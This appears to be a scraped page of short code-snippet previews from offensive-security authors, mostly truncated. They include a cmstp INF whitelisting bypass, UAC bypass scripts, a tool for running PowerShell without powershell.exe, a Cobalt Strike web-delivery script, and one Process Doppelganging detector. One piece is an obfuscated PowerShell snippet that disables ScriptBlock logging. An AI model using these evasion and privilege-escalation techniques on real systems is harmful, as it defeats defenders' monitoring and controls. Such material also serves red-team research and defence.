NickTyrer

;cmstp.exe /s cmstp.inf

[version]
Signature=$chicago$
AdvancedINF=2.5

[DefaultInstall_SingleUser]
UnRegisterOCXs=UnRegisterOCXSection

[UnRegisterOCXSection]

dezhub

function Get-Doppelgangers
{
    <# 
    .SYNOPSIS 
    
    Detects use of NTFS transactions for stealth/evasion, aka 'Process Doppelganging'
     
    Author: Joe Desimone (@dez_) 
    License: BSD 3-Clause 
    

N3mes1s

<?xml version="1.0" ?>
<!-- Te.exe DataDrivenTest.wsc                                                                  -->
<!-- C:\Program Files (x86)\Windows Kits\10\Testing\Runtimes\TAEF > ./TE.exe DataDrivenTest.wsc -->
<!-- Test Authoring and Execution Framework v5.8k for x64                                       -->
<!-- StartGroup: VBSampleTests::TestOne                                                         -->
<!-- Calling TestOne                                                                            -->
<!-- EndGroup: VBSampleTests::TestOne [Passed]                                                  -->
<!-- Summary: Total=1, Passed=1, Failed=0, Blocked=0, Not Run=0, Skipped=0                      -->
<?component error="true" debug="true"?>
<package>

bneg

/*
 * SharpPick aka InexorablePoSH
 * Description: Application to load and run powershell code via the .NET assemblies
 * License: 3-Clause BSD License. See Veil PowerTools Project
 * 
 * This application is part of Veil PowerTools, a collection of offensive PowerShell 
 * capabilities. Hope they help! 
 * 
 * This is part of a sub-repo of PowerPick, a toolkit used to run PowerShell code without the use of Powershell.exe 
 */

nullbind

using System;
using System.Text;
using System.Security.Principal;
using System.Runtime.InteropServices;
using Microsoft.Win32;

namespace lsautil
{

    // https://msdn.microsoft.com/en-us/library/microsoft.win32.registry(v=vs.110).aspx

tyranid

# Powershell script to bypass UAC on Vista+ assuming
# there exists one elevated process on the same desktop.
# Technical details in:
# https://tyranidslair.blogspot.co.uk/2017/05/reading-your-way-around-uac-part-1.html
# https://tyranidslair.blogspot.co.uk/2017/05/reading-your-way-around-uac-part-2.html
# https://tyranidslair.blogspot.co.uk/2017/05/reading-your-way-around-uac-part-3.html
# You need to Install-Module NtObjectManager for this to run.

Import-Module NtObjectManager

cobbr

# ScriptBlock Logging Bypass
# @cobbr_io

$GroupPolicyField = [ref].Assembly.GetType('System.Management.Automation.Utils')."GetFie`ld"('cachedGroupPolicySettings', 'N'+'onPublic,Static')
If ($GroupPolicyField) {
    $GroupPolicyCache = $GroupPolicyField.GetValue($null)
    If ($GroupPolicyCache['ScriptB'+'lockLogging']) {
        $GroupPolicyCache['ScriptB'+'lockLogging']['EnableScriptB'+'lockLogging'] = 0
        $GroupPolicyCache['ScriptB'+'lockLogging']['EnableScriptBlockInvocationLogging'] = 0
    }

NickTyrer

<?xml version="1.0" encoding="utf-8"?>
<package>
  <component
    id="dummy">
    <registration
      description="dummy"
      progid="dummy"
      version="1.00"
      remotable="True">
      <script

leoloobeek

using System;
using System.Linq;
using System.Reflection;
using System.Configuration.Install;
using System.Runtime.InteropServices;

using Microsoft.Win32;
/*
InstallUtil.exe C# version of Event Viewer UAC bypass

rsmudge

# Python Stageless Scripted Web Delivery

# setup our stageless Python Web Delivery attack
sub setup_attack {
	local('%options $x86payload $x64payload $url $script');
	%options = $3;

	# generate our stageless x86 payload
	artifact_stageless(%options["listener"], "raw", "x86", $null, $this);
	yield;